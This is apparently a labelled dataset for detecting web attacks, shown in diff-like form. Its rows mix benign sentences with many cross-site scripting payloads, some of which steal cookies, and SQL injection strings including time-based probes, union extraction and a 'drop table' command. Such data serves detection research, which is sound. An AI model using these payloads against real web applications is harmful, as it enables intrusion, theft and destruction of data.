purchase an item select the Add To Shopping Bas,0,normal,25260 -"<fieldset ondblclick=""alert(1)"">test</fieldset>",1,XSS,6941 -"1, ( select ( case when ( 5217 = 5217 ) then 1 els",2,SQLi,20008 -You can search the site easily to find just what y,0,normal,25088 -"1"" ) ) as tgwp where 9405 = 9405",2,SQLi,12859 -&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt,1,XSS,1466 -"-4068' ) ) ) union all select 9491,9491,9491--",2,SQLi,16554 -1' or sleep ( 5 ) and 'rpqn' like 'rpqn,2,SQLi,17664 -Drivers will be able to select from four different,0,normal,26227 -<style>:target {color:red;}</style><svg id=x style,1,XSS,2391 -Select the ideal gift for a loved one.,0,normal,24050 -1' or 8421 = ( select count ( * ) from generate_se,2,SQLi,17506 -"1"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,21140 -1'|| ( select 'svgd' from dual where 5188 = 5188 u,2,SQLi,12913 -"<listing draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,8574 -Select the perfect location for the event.,0,normal,24246 -"<ruby draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,5298 -"-7551 or elt ( 6900 = 7195,7195 )",2,SQLi,18070 -1' ) as jxtg where 1071 = 1071 and sleep ( 5 ) --,2,SQLi,21804 -1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,14802 -"On Android devices, open the Play Store, click the",0,normal,25850 -"<img \x00src=x onerror=""javascript:alert(1)"">",1,XSS,663 -1'|| ( select 'wyng' from dual where 2157 = 2157 u,2,SQLi,12292 -"<rb ondblclick=""alert(1)"">test</rb>",1,XSS,6818 -"1"" ) where 6671 = 6671 or char ( 119 ) ||char ( 10",2,SQLi,12194 -"<base onclick=""alert(1)"">test</base>",1,XSS,3468 -"-7482%"" ) ) or 1570 = convert ( int, ( select char",2,SQLi,12377 -"<a href=""\x0Ajavascript:javascript:alert(1)"" id=""f",1,XSS,528 --4595' ) where 4892 = 4892 order by 1--,2,SQLi,18655 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11989 -<ruby id=x tabindex=1 onactivate=alert(1)></ruby>,1,XSS,5469 -<form><input formaction=javascript:alert(1) type=i,1,XSS,9177 -"<rp onkeypress=""alert(1)"" contenteditable>test</rp",1,XSS,8632 -<style>@keyframes slidein {}</style><menuitem styl,1,XSS,8795 -"<q onmouseout=""alert(1)"">test</q>",1,XSS,3782 -1' ) ) ) and 8514 = ( select count ( * ) from doma,2,SQLi,12831 +1' ) ) and 3754 = ( select upper ( xmltype ( chr (,2,SQLi,14162 +"-6000"" ) where 1797 = 1797 union all select 1797,1",2,SQLi,16587 +"<script draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,2350 +<xmp id=x tabindex=1 onactivate=alert(1)></xmp>,1,XSS,6077 +"-8409%' ) or make_set ( 9354 = 9354,7185 ) and ( '",2,SQLi,16105 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8937 +1,0,normal,26710 +-9007 ) as gill where 6462 = 6462 union all select,2,SQLi,20200 +""") or benchmark(10000000,MD5(1))#",2,SQLi,10845 +1' ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ,2,SQLi,21737 +"1"" ) where 6367 = 6367 union all select null,null,",2,SQLi,17170 +"1 where 6412 = 6412 union all select null,null,nul",2,SQLi,16957 +"<xmp oncut=""alert(1)"" contenteditable>test</xmp>",1,XSS,6943 +Select fork.,0,normal,24529 +1%' and 3707 = ( select count ( * ) from sysibm.sy,2,SQLi,21399 +1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr,2,SQLi,12852 +&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;,1,XSS,1467 +1'|| ( select 'zqwd' where 1647 = 1647 rlike sleep,2,SQLi,18515 +"-6170 ) ) ) or 1 group by concat ( 0x7171706a71, (",2,SQLi,13085 +Dumplin' arrives in select theaters and on Netflix,0,normal,26224 +"<kbd onmousedown=""alert(1)"">test</kbd>",1,XSS,2392 +Select a program to watch on TV.,0,normal,24047 +1 ) ) as msug where 3503 = 3503 and sleep ( 5 ) #,2,SQLi,13586 +1' ) where 8274 = 8274,2,SQLi,21138 +Where's your SQL aid?,0,normal,23411 +"<sub onmouseout=""alert(1)"">test</sub>",1,XSS,8576 +Select a scent for your room.,0,normal,24243 +"<u onkeydown=""alert(1)"" contenteditable>test</u>",1,XSS,5300 +1 where 6881 = 6881 procedure analyse ( extractval,2,SQLi,14725 +"1 where 1842 = 1842 or 8514 = benchmark ( 5000000,",2,SQLi,18436 +"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,18180 +"1"" ) ) and 6510 = ( select count ( * ) from sysuse",2,SQLi,15145 +"<img \x00src=x onerror=""javascript:alert(1)"">",1,XSS,663 +1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105,2,SQLi,12285 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6820 +Select acquire.,0,normal,24559 +"<thead onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,3470 +1 ) ) as muyz where 6105 = 6105,2,SQLi,12370 +"<a href=""\x0Ajavascript:javascript:alert(1)"" id=""f",1,XSS,528 +",drop table temp --",2,SQLi,11761 +select pg_sleep ( 5 ) and 'rpka' = 'rpka,2,SQLi,13983 +<del onpointerup=alert(1)>XSS</del>,1,XSS,5471 +<form><input formaction=javascript:alert(1) type=s,1,XSS,9179 +"<ruby onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,8634 +"<svg><path><animateMotion onbegin=alert(1) dur=""1s",1,XSS,8797 +"<picture draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,3784 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) )",2,SQLi,12824 "<a href=""javas\x07cript:javascript:alert(1)"" id=""f",1,XSS,430 -1 ) ) ) or 7427 = dbms_pipe.receive_message ( chr ,2,SQLi,14468 -<svg onpointerover=alert(1)>XSS</svg>,1,XSS,7681 -1 ) as attr where 8085 = 8085 and 9254 = ( select ,2,SQLi,12699 -1' ) and 6510 = ( select count ( * ) from sysusers,2,SQLi,18265 -1%' and 4595 = 4595#,2,SQLi,12138 -<u id=x tabindex=1 onfocusin=alert(1)></u>,1,XSS,4882 -Select your climb.,0,normal,25028 -<td id=x tabindex=1 onfocusin=alert(1)></td>,1,XSS,5144 -)))) waitfor delay '0:0:20' /*,2,SQLi,22494 -"1"" union all select null,null,null,null,null,null,",2,SQLi,17214 -"<IMG SRC=x onloadstart=""alert(String.fromCharCode(",1,XSS,1227 -"1"" ) as ymto where 3453 = 3453",2,SQLi,15363 -1' ) as ncou where 9166 = 9166 and ( select * from,2,SQLi,12966 -1 ) where 2010 = 2010,2,SQLi,15111 -"[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNT",1,XSS,9414 -"union ( select NULL, NULL, NULL, NULL, ( select @@",2,SQLi,11861 -) ) or ( ( 'x' ) ) = ( ( 'x,2,SQLi,11649 +"1"" ) as qjyu where 2679 = 2679 and 6414 = ( select",2,SQLi,14461 +"<noscript onkeyup=""alert(1)"" contenteditable>test<",1,XSS,7683 +"1' ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5",2,SQLi,12692 +1 ) where 4653 = 4653 or 6793 = ( select 6793 from,2,SQLi,20140 +1' ) ) ) or 5286 = ( select count ( * ) from all_u,2,SQLi,17442 +<pre id=x tabindex=1 onfocusin=alert(1)></pre>,1,XSS,4884 +1 ) ) as pjkd where 1105 = 1105 and 4386 = utl_ina,2,SQLi,18876 +"<dfn draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,5146 +) waitfor delay '0:0:20' /*,2,SQLi,22491 +"{""id"":null,""name"":""Azumarill""}",0,normal,26981 +"<IMG SRC=x onpause=""alert(String.fromCharCode(88,8",1,XSS,1228 +"-1272' or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,18052 +"-2394' ) union all select 1650,1650,1650,1650,1650",2,SQLi,12959 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,15406 +"![a'""`onerror=prompt(document.cookie)](x)\",1,XSS,9416 +Select the best course for your education.,0,normal,24106 +select * from users where id = '1' <@&1 union sele,2,SQLi,11651 <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077,1,XSS,904 -<blockquote id=x tabindex=1 onbeforeactivate=alert,1,XSS,7589 -"<strong draggable=""true"" ondragend=""alert(1)"">test",1,XSS,8324 -1 where 3027 = 3027 and 4595 = 4595#,2,SQLi,21530 -<animatetransform onpointerover=alert(1)>XSS</anim,1,XSS,2494 +<tt id=x tabindex=1 ondeactivate=alert(1)></tt><in,1,XSS,7591 +"<address onmouseup=""alert(1)"">test</address>",1,XSS,8326 +1' ) where 8586 = 8586 and 3202 = like ( 'abcdefg',2,SQLi,20360 +"<dd onmouseleave=""alert(1)"">test</dd>",1,XSS,2495 <audio autoplay controls onpause=alert(1)><source ,1,XSS,86 -Save up to 30% off select Men's Skincare & Groomin,0,normal,25720 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2992 -Filter the pool.,0,normal,22832 -<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><,1,XSS,2259 -Why else would he want to select the trail she fol,0,normal,25124 -"<menuitem onmousemove=""alert(1)"">test</menuitem>",1,XSS,3080 -"-4527' union all select 7115,7115#",2,SQLi,15770 -<source id=x tabindex=1 ondeactivate=alert(1)></so,1,XSS,6390 -"1"" where 4672 = 4672",2,SQLi,16385 -<button onReset=javascript:alert(1)>,1,XSS,9653 -<a onmouseover=alert(document.cookie)\>xxs link\</,1,XSS,3017 -Where's the best spot to do some birdwatching?,0,normal,23688 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,12770 -1' ) where 9226 = 9226 and 9660 = ( select count (,2,SQLi,21714 -"1 where 8389 = 8389 union all select null,null,nul",2,SQLi,20011 -"<rtc onkeydown=""alert(1)"" contenteditable>test</rt",1,XSS,4989 -<;SCRIPT SRC=//ha.ckers.org/.j>;,1,XSS,1654 -"<sub onmouseover=""alert(1)"">test</sub>",1,XSS,4363 -select * from users where id = 1 or \<\. or 1 = 1 ,2,SQLi,11615 -"<div style=""background-image: url(javascript:docum",1,XSS,1533 -You have pictures taken of you and then you select,0,normal,25070 -</title><script x> alert(1) </script 1=2,1,XSS,9450 -1 ) where 8474 = 8474 or 5356 = ( select count ( *,2,SQLi,20801 -1' ) or 8315 = ( select count ( * ) from sysibm.sy,2,SQLi,16374 -&#x61;lert(1),1,XSS,9399 +Save up to 30% off select Simple Modern water bott,0,normal,25717 +<style>:target {color:red;}</style><strong id=x st,1,XSS,2993 +"-5606 ) union all select 7118,7118,7118,7118,7118,",2,SQLi,19295 +"<menu onmouseup=""alert(1)"">test</menu>",1,XSS,2260 +Why would a supernatural force use a videotape to ,0,normal,25121 +"<div ondblclick=""alert(1)"">test</div>",1,XSS,3081 +"1' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14807 +"<audio onkeypress=""alert(1)"" contenteditable>test<",1,XSS,6392 +1 ) as wiyx where 6515 = 6515,2,SQLi,16376 +<button onResizeEnd=javascript:alert(1)>,1,XSS,9655 +"<header onmouseleave=""alert(1)"">test</header>",1,XSS,3018 +1 ) ) as rroe where 4840 = 4840,2,SQLi,20349 +1 ) ) ) or sleep ( 5 ) and ( ( ( 2209 = 2209,2,SQLi,20185 +"1"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""tuhy"" li",2,SQLi,21712 +select ( case when ( 4774 = 1535 ) then 4774 else ,2,SQLi,15497 +"<?xml:namespace prefix=""t"" ns=""urn:schemas-microso",1,XSS,4991 +"<;IMG SRC="";javascript:alert(';XSS';)"";",1,XSS,1655 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4365 +ý or 1 = 1 --,2,SQLi,11617 +"<div style=""behaviour: url([link to code]);"">",1,XSS,1534 +"1' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4",2,SQLi,13870 +<svg onload=alert(1)//,1,XSS,9452 +-8047' or 3038 = 3038,2,SQLi,20650 +1 ) where 5465 = 5465 or 8315 = ( select count ( *,2,SQLi,14933 +eval('\x61lert(1)'),1,XSS,9401 onclick=prompt(8)>@x.y,1,XSS,344 -<keygen autofocus onfocus=alert(1)>,1,XSS,8463 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,20724 -<audio onfocusout=alert(1) tabindex=1 id=x></audio,1,XSS,8192 -onmouseover=alert(1)//,1,XSS,9679 -"1"" ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,14385 -1' ) as xqbq where 1619 = 1619 and 6240 = ( 'qqpjq,2,SQLi,21868 -<basefont onfocusout=alert(1) tabindex=1 id=x></ba,1,XSS,1983 -"1"" ) ) union all select null,null,null,null,null#",2,SQLi,17490 -Choose fields where applicable.,0,normal,23294 -"<ul onkeypress=""alert(1)"" contenteditable>test</ul",1,XSS,3686 -"<time onkeyup=""alert(1)"" contenteditable>test</tim",1,XSS,8360 -The process can select even a single binding phage,0,normal,25387 -"1"" ) as jiiq where 6847 = 6847",2,SQLi,13823 -AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ,2,SQLi,11203 -select current_setting('data_directory');,2,SQLi,22512 -"<rtc oncut=""alert(1)"" contenteditable>test</rtc>",1,XSS,6927 -"{""id"":null,""name"":""GroundLocomon""}",0,normal,27167 -"-8353' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, (",2,SQLi,21601 -"{""id"":null,""name"":""hidden""}",0,normal,26962 -1' where 9420 = 9420 and 8189 = ( select count ( *,2,SQLi,16203 -1' or 7417 = ( select count ( * ) from sysibm.syst,2,SQLi,19096 +"<template onmouseenter=""alert(1)"">test</template>",1,XSS,8465 +"1' union all select null,null,null,null,null,null,",2,SQLi,20722 +<main onpointerout=alert(1)>XSS</main>,1,XSS,8194 +"<x 1=1""onxxx=1",1,XSS,9681 +1'+ ( select dyfw where 7743 = 7743 and 8407 = ( s,2,SQLi,13151 +"-9152"" ) ) as avga where 3825 = 3825 order by 1#",2,SQLi,18322 +<style>:target {transform: rotate(180deg);}</style,1,XSS,1984 +"1%"" ) or 8421 = ( select count ( * ) from generate",2,SQLi,19478 +Identify columns where applicable.,0,normal,23291 +"<em onkeydown=""alert(1)"" contenteditable>test</em>",1,XSS,3688 +"<basefont onkeydown=""alert(1)"" contenteditable>tes",1,XSS,8362 +1 where 3354 = 3354,2,SQLi,12582 +1%' ) ) ) and 8312 = dbms_pipe.receive_message ( c,2,SQLi,12901 +)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) A,2,SQLi,11205 +"On Android devices, open the Play Store, click the",0,normal,25850 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6929 +"{""id"":null,""name"":""KingEtemon""}",0,normal,27165 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,19725 +"{""id"":null,""firstName"":""Judy"",""lastName"":""Tan"",""ad",0,normal,26959 +Select the right playlist for the moment.,0,normal,24139 +"-4152"" ) where 9781 = 9781 union all select 9781,9",2,SQLi,14585 "<META HTTP-EQUIV=""Link"" Content=""<%(css)s>; REL=st",1,XSS,754 -@BlizzardCS I’ve struggled trying to get into @P,0,normal,26511 -<button onEnd=javascript:alert(1)>,1,XSS,9611 -<link onreadystatechange=alert(1) rel=stylesheet h,1,XSS,8645 -"ORDER BY 1,SLEEP(5)#",2,SQLi,10447 -<blockquote id=x tabindex=1 ondeactivate=alert(1)>,1,XSS,4064 -"<footer onmouseup=""alert(1)"">test</footer>",1,XSS,7984 -1 union all select null--,2,SQLi,18493 +1 ) ) as ewlg where 3722 = 3722 rlike sleep ( 5 ) ,2,SQLi,14271 +<button onErrorUpdate=javascript:alert(1)>,1,XSS,9613 +<dt onpointerover=alert(1)>XSS</dt>,1,XSS,8647 +"ORDER BY 1,SLEEP(5),3,4#",2,SQLi,10449 +<param id=x tabindex=1 onactivate=alert(1)></param,1,XSS,4066 +"<rp draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,7986 +select ( case when ( 4996 = 1734 ) then 1 else 499,2,SQLi,18491 <body oninput=javascript:alert(1)><input autofocus,1,XSS,626 -"{""id"":null,""name"":""tail""}",0,normal,27110 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,12248 -"1"" ) ) ) order by 1#",2,SQLi,15982 -1 ) or 9643 = ( select count ( * ) from domain.dom,2,SQLi,14092 -"<base onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,4245 -"1"" ) ) and 7533 = 7533 and ( ( ""gkca"" = ""gkca",2,SQLi,22120 -<th onpointermove=alert(1)>XSS</th>,1,XSS,2439 -1 ) or 5356 = ( select count ( * ) from sysusers a,2,SQLi,15500 -"SRC=# onmouseover=""alert(document.cookie)",1,XSS,2070 -"1"" ) as rbgl where 3822 = 3822 procedure analyse (",2,SQLi,17898 -<svg><shadow onload=alert(1)></shadow>,1,XSS,5225 -"1"" ) ) waitfor delay '0:0:5'--",2,SQLi,20532 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#",2,SQLi,10545 -select * from users where id = 1.%@ or 1 = 1 -- 1,2,SQLi,11744 -<script> var+MouseEvent=function+MouseEvent(){}; M,1,XSS,9271 -) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR,2,SQLi,11342 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2176 -"<strong onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,8817 -<style>:target {color: red;}</style><ins id=x styl,1,XSS,5084 -Select learn.,0,normal,24711 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4106 -"1%' ) ) or extractvalue ( 1297,concat ( 0x5c,0x717",2,SQLi,18083 -"<script onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,3551 -"<picture onbeforecut=""alert(1)"" contenteditable>te",1,XSS,4354 -Filter pool.,0,normal,23091 -1' ) as ibaw where 2130 = 2130 and 9198 = 9198--,2,SQLi,19380 --5982' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ,2,SQLi,13054 -1 where 5081 = 5081 or char ( 68 ) ||char ( 69 ) |,2,SQLi,14171 -1' ) and 7533 = 7533 and ( 'cryr' = 'cryr,2,SQLi,18217 -<style>:target {color: red;}</style><blockquote id,1,XSS,6403 -); alert('xss'); var x=',1,XSS,1355 -"1' and elt ( 4249 = 4249,7259 )",2,SQLi,21297 -"<area onkeydown=""alert(1)"" contenteditable>test</a",1,XSS,7458 -Carefully select your guests.,0,normal,24366 -<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt,1,XSS,7745 -"iif ( 1378 = 6569,1,1/0 )",2,SQLi,16666 -"1 where 9072 = 9072 and elt ( 4249 = 4249,7259 ) -",2,SQLi,20111 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19339 -&lt;IMG SRC=javascript&#058;alert('XSS')&gt;,1,XSS,1100 -1 ) where 6035 = 6035,2,SQLi,16414 -%20or%20''=',2,SQLi,10118 -"1"" ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,15371 --8465' where 5242 = 5242 or 3806 = 7423--,2,SQLi,13641 -"<track oncopy=""alert(1)"" contenteditable>test</tra",1,XSS,8627 -&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scr,1,XSS,1084 -"<embed onpaste=""alert(1)"" contenteditable>test</em",1,XSS,3605 -1 where 7442 = 7442,2,SQLi,17042 -"{""id"":null,""firstName"":""Boon"",""lastName"":""Lee"",""sp",0,normal,26847 -Delete the extra spaces.,0,normal,22565 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21958 +"{""id"":null,""name"":""Vespiquen""}",0,normal,27108 +"-2072"" ) as rjcz where 2491 = 2491 or 6872 = 6872-",2,SQLi,12241 +-5825 ) as mflf where 3999 = 3999 or make_set ( 14,2,SQLi,15974 +Select bistro.,0,normal,24538 +<svg id=x tabindex=1 ondeactivate=alert(1)></svg><,1,XSS,4247 +1 and 7533 = 7533,2,SQLi,19144 +"<multicol onmouseup=""alert(1)"">test</multicol>",1,XSS,2440 +We've been asking respondents to select from the l,0,normal,25164 +<command id=x tabindex=1 ondeactivate=alert(1)></c,1,XSS,2071 +"-9588' ) ) union all select 7280,7280,7280,7280,72",2,SQLi,17896 +"<img oncut=""alert(1)"" contenteditable>test</img>",1,XSS,5227 +"1"" ) where 3321 = 3321",2,SQLi,22229 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10547 +select * from users where id = 1 or 1&@# = 1 union,2,SQLi,11746 +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+X,1,XSS,9273 +(sleep 5)--,2,SQLi,11344 +"<kbd onmouseleave=""alert(1)"">test</kbd>",1,XSS,2177 +"<multicol draggable=""true"" ondragend=""alert(1)"">te",1,XSS,8819 +<section onblur=alert(1) tabindex=1 id=x></section,1,XSS,5086 +Select the perfect dress for the occasion.,0,normal,24079 +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgro,1,XSS,4108 +Where's the SQL statement?,0,normal,23459 +<th onpointerout=alert(1)>XSS</th>,1,XSS,3553 +<s onblur=alert(1) tabindex=1 id=x></s><input auto,1,XSS,4356 +"-8344 or 1570 = convert ( int, ( select char ( 113",2,SQLi,21643 +select * from users where id = '1' or \<\. union s,2,SQLi,12055 +1'+ ( select ttae where 4601 = 4601 or 2633 = dbms,2,SQLi,13047 +1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ,2,SQLi,14164 +1 ) ) as xoch where 8765 = 8765 and 3754 = ( selec,2,SQLi,18215 +"<nobr draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,6405 +\\'); alert(\'xss\');var x=\',1,XSS,1356 +1' where 2911 = 2911,2,SQLi,14832 +<strong onpointerleave=alert(1)>XSS</strong>,1,XSS,7460 +"1' procedure analyse ( extractvalue ( 5840,concat ",2,SQLi,13483 +"<keygen oncontextmenu=""alert(1)"">test</keygen>",1,XSS,7747 +1' where 7080 = 7080 or 8514 = benchmark ( 5000000,2,SQLi,16771 +distinct,0,normal,23123 +"{""id"":null,""name"":""subject""}",0,normal,27153 +&lt;IMG SRC=javascript&#058;alert(String&#46;fromC,1,XSS,1101 +"1"" or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,16852 +hi' or 'x'='x';,2,SQLi,10120 +"1"" where 7371 = 7371 waitfor delay '0:0:5'--",2,SQLi,20523 +1' ) ) ) ( select ( case when ( 4587 = 4587 ) then,2,SQLi,13634 +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfo,1,XSS,8629 +"&lt;IMG SRC=\""javascript&#058;alert('XSS')\""",1,XSS,1085 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3607 +1 ) ) ) or 8315 = ( select count ( * ) from sysibm,2,SQLi,17040 +select ( case when ( 9696 = 2874 ) then 1 else 969,2,SQLi,20666 +Sort the playing cards.,0,normal,22562 +Be sure to select the correct class of service in ,0,normal,26333 "&lt;IMG SRC=\""livescript&#058;&#91;code&#93;\""&gt;",1,XSS,992 -1' in boolean mode ) and 4457 = 3885#,2,SQLi,20526 -<address id=x tabindex=1 onactivate=alert(1)></add,1,XSS,1888 -1%' union all select null#,2,SQLi,20476 -"{""id"":null,""name"":""Cottonee""}",0,normal,27306 -<svg><var onload=alert(1)></var>,1,XSS,4760 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6444 -"1"" ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544",2,SQLi,12705 -"1 where 5627 = 5627 and 3202 = like ( 'abcdefg',up",2,SQLi,16606 -"1' union all select null,null,null,null,null,null,",2,SQLi,17517 -"-4546' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,13173 -"1%"" ) ) and 3824 = benchmark ( 5000000,md5 ( 0x765",2,SQLi,18695 -"1"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |",2,SQLi,19701 -"<div id=""108""><!-- IE 5-8 standards mode -->",1,XSS,9098 -Whether you choose to spend a fortune on dishes or,0,normal,25137 -Select vanish.,0,normal,24683 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5490 -1'+ ( select 'qpxk' where 7139 = 7139 procedure an,2,SQLi,17184 -"1"" ) as jrse where 9185 = 9185 and 7756 = dbms_uti",2,SQLi,17468 -<li onpointermove=alert(1)>XSS</li>,1,XSS,8139 -"1"" ) ) or 1022 = ( select count ( * ) from all_use",2,SQLi,14008 -"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20",2,SQLi,10909 -Choose fields where necessary.,0,normal,23340 -1'|| ( select 'lstx' from dual where 2972 = 2972 o,2,SQLi,18086 -1%' ) ) and 2006 = 2006,2,SQLi,18674 -"<dd onkeyup=""alert(1)"" contenteditable>test</dd>",1,XSS,8710 -"<style>@keyframes x{}</style><section style=""anima",1,XSS,7576 -"<input onmousedown=""alert(1)"">test</input>",1,XSS,4052 -"<del onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5008 -"<thead onkeyup=""alert(1)"" contenteditable>test</th",1,XSS,3140 -"{""id"":null,""name"":""Drilbur""}",0,normal,27452 -"<script oncontextmenu=""alert(1)"">test</script>",1,XSS,7790 -"1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,21061 -select * from users where id = 1.*\ union select n,2,SQLi,12075 -Index columns where needed.,0,normal,23272 -"<i onkeyup=""alert(1)"" contenteditable>test</i>",1,XSS,4751 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,16999 +<tr onpointerup=alert(1)>XSS</tr>,1,XSS,1889 +-4758%' ) ) or 5903 = ( 'qqpjq'|| ( select case 59,2,SQLi,20474 +"1' ) and ( select 9067 from ( select count ( * ) ,",2,SQLi,22149 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4762 +<em id=x tabindex=1 onbeforeactivate=alert(1)></em,1,XSS,6446 +"1' ) ) ) and elt ( 9041 = 6421,6421 ) and ( ( ( 'i",2,SQLi,12698 +"-1051"" ) where 6586 = 6586 or 6647 = 6738#",2,SQLi,16604 +"-9987 ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ",2,SQLi,17515 +"1"" ) where 9295 = 9295 and 7756 = dbms_utility.sql",2,SQLi,18858 +"-1526' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'xp",2,SQLi,18119 +1 ) ) ( select ( case when ( 5451 = 5451 ) then re,2,SQLi,19699 +"<div id=""110""><svg xmlns=""http://www.w3.org/2000/s",1,XSS,9100 +"Whichever finish you select, you'll be saving a de",0,normal,25134 +Select sparkle.,0,normal,24680 +<bdo onpointerup=alert(1)>XSS</bdo>,1,XSS,5492 +"-3546%"" or 5903 = ( 'qqpjq'|| ( select case 5903 w",2,SQLi,13713 +-4542' ) ) order by 1#,2,SQLi,18367 +"<meter draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8141 +Select quintuple-check.,0,normal,24572 +"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%2",2,SQLi,10911 +Fetch records where applicable.,0,normal,23337 +"1' union all select null,null,null,null,null#",2,SQLi,18084 +1 ) ) as avdz where 1881 = 1881 and 6510 = ( selec,2,SQLi,18672 +"print ""<IMG SRC=java\0script:alert(\""\"")>"";' >",1,XSS,8712 +<cite onpointerup=alert(1)>XSS</cite>,1,XSS,7578 +"<br draggable=""true"" ondragend=""alert(1)"">test</br",1,XSS,4054 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5010 +<area id=x tabindex=1 ondeactivate=alert(1)></area,1,XSS,3142 +Check conditions where valid.,0,normal,23301 +"<u onbeforecopy=""alert(1)"" contenteditable>test</u",1,XSS,7792 +ABC Carpet & Home: Up to 40% off select furniture.,0,normal,26416 +select * from users where id = 1 -@<@ union select,2,SQLi,12068 +Group data where applicable.,0,normal,23269 +<pre onpointerup=alert(1)>XSS</pre>,1,XSS,4753 <iframe src=http://ha.ckers.org/scriptlet.html <,1,XSS,814 -"1' ) where 5276 = 5276 union all select null,null-",2,SQLi,20184 -<nextid onblur=alert(1) tabindex=1 id=x></nextid><,1,XSS,7884 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,13934 -"<abbr onmousedown=""alert(1)"">test</abbr>",1,XSS,8433 -1 ) ) and ( select * from ( select ( sleep ( 5 ) ),2,SQLi,13873 -select ( case when ( 9907 = 2736 ) then 9907 else ,2,SQLi,21395 -1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ),2,SQLi,14376 -") RLIKE SLEEP(5) AND (1337""=""1337",2,SQLi,11234 -1 ) and 4386 = utl_inaddr.get_host_address ( chr (,2,SQLi,21149 -"<rb onbeforecut=""alert(1)"" contenteditable>test</r",1,XSS,4469 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3108 -<main id=x tabindex=1 onfocusin=alert(1)></main>,1,XSS,7926 -"<style>@keyframes x{}</style><rtc style=""animation",1,XSS,2007 -"1"" ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d",2,SQLi,14828 -"iif ( 1878 = 2513,1,1/0 )",2,SQLi,16208 -"1%"" and elt ( 4249 = 4249,7259 ) and ""%"" = """,2,SQLi,13626 --7786' ) ) or 9323 = 9323#,2,SQLi,13590 -<noscript onpointermove=alert(1)>XSS</noscript>,1,XSS,8172 -1' ) where 8128 = 8128,2,SQLi,20777 -"<big onmouseup=""alert(1)"">test</big>",1,XSS,5965 -Select a flavor for your morning smoothie.,0,normal,24134 -"-4694%"" ) ) ) union all select 9178,9178,9178,9178",2,SQLi,18897 -"many beneficiaries, not just a select 